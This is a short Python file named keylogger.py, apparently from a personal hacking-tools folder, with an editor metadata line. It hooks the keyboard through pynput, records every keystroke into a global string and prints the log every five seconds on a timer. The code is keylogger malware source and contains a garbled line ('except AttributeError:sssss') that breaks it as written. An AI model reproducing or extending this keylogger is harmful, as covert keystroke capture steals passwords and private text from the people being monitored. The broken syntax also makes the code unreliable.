file:///root/Code/py/htools/keylogger.py {"mtime":1579972615141,"ctime":1579831592900,"size":540,"etag":"34h5r9376hd","orphaned":false}
import pynput.keyboard
import threading


log = ''


def process_key_press(key):
    global log
    try:
        log = log + str(key.char)
    except AttributeError:sssss
        if key == key.space:
            log = log + ' '
        else:
            log = log + ' ' + str(key) + ' '


def report():
    global log
    print(log)
    log = ''
    timer = threading.Timer(5, report)
    timer.start()


keyboard_listener = pynput.keyboard.Listener(on_press=process_key_press)

with keyboard_listener:
    report()
    keyboard_listener.join()
